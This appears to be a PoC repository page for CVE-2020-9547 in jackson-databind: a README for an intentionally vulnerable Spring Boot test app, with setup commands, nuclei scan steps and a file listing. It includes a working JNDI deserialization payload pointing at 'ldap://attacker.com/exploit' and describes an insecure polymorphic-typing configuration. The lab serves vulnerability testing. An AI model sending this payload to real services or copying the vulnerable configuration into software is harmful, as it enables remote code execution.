CVE-2020-9547 PoC — FasterXML jackson-databind 代码问题漏洞

Source

Associated Vulnerability

Readme

# CVE-2020-9547 Vulnerable Application

This is a vulnerable Spring Boot application designed to test the CVE-2020-9547 vulnerability in FasterXML jackson-databind.

## Vulnerability Details

- **CVE ID**: CVE-2020-9547
- **Severity**: Critical (CVSS 9.8)
- **Affected Version**: jackson-databind < 2.9.10.4
- **Vulnerability Type**: Deserialization RCE
- **Vulnerable Class**: `com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig`

## Setup Instructions

### Prerequisites
- Docker and Docker Compose
- Maven (for building from source)

### Quick Start with Docker

1. **Build and run the application:**
   ```bash
   docker-compose up --build
   ```

2. **Verify the application is running:**
   ```bash
   curl http://localhost:8080/health
   ```

### Building from Source

1. **Build the application:**
   ```bash
   mvn clean package
   ```

2. **Build the Docker image:**
   ```bash
   docker build -t cve-2020-9547-vulnerable-app .
   ```

3. **Run the container:**
   ```bash
   docker run -p 8080:8080 cve-2020-9547-vulnerable-app
   ```

## Testing the Vulnerability

### Using Nuclei

1. **Run the nuclei template against the vulnerable application:**
   ```bash
   nuclei -u http://localhost:8080 -t http/cves/2020/CVE-2020-9547.yaml
   ```

2. **With interactsh for out-of-band detection:**
   ```bash
   nuclei -u http://localhost:8080 -t http/cves/2020/CVE-2020-9547.yaml -oob
   ```

### Manual Testing

The application exposes several endpoints that accept JSON payloads:

- `POST /` - Root endpoint
- `POST /api` - API endpoint  
- `POST /json` - JSON endpoint
- `PUT /data` - Data endpoint
- `GET /health` - Health check

### Example Vulnerable Payload

```json
{
  "@class": "com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig",
  "properties": {
    "@class": "java.util.HashMap",
    "userTransactionName": {
      "@class": "com.sun.rowset.JdbcRowSetImpl",
      "dataSourceName": "ldap://attacker.com/exploit",
      "autoCommit": true
    }
  }
}
```

## Application Configuration

The vulnerable application is configured with:

- **Jackson Version**: 2.9.10.3 (vulnerable)
- **Polymorphic Type Handling**: Enabled with `LaissezFaireSubTypeValidator`
- **Default Typing**: `NON_FINAL`
- **iBatis SQLMap**: Included for the vulnerable class

## Security Notice

⚠️ **WARNING**: This application is intentionally vulnerable and should only be used in controlled testing environments. Do not deploy this in production or on public networks.

## Cleanup

To stop and remove the containers:

```bash
docker-compose down
```

To remove the Docker image:

```bash
docker rmi cve-2020-9547-vulnerable-app
```

## References

- [CVE-2020-9547 Details](https://nvd.nist.gov/vuln/detail/CVE-2020-9547)
- [Jackson Databind Issue #2620](https://github.com/FasterXML/jackson-databind/issues/2620)
- [Nuclei Template](http/cves/2020/CVE-2020-9547.yaml) 

File Snapshot

 [4.0K]  /data/pocs/133d6335f952674947387f4ff766f136ba607f1c
├── [1.1K]  build.sh
├── [ 491]  docker-compose.yml
├── [ 693]  Dockerfile
├── [5.0K]  pom.xml
├── [2.8K]  README.md
├── [ 357]  render.yaml
├── [4.0K]  src
│   └── [4.0K]  main
│       ├── [4.0K]  java
│       │   └── [4.0K]  com
│       │       └── [4.0K]  example
│       │           └── [ 12K]  VulnerableApp.java
│       └── [4.0K]  resources
│           └── [ 402]  application.properties
├── [1.3K]  test-dns.sh
├── [2.4K]  test-payloads.json
└── [3.2K]  test-vulnerability.sh

6 directories, 11 files

Remarks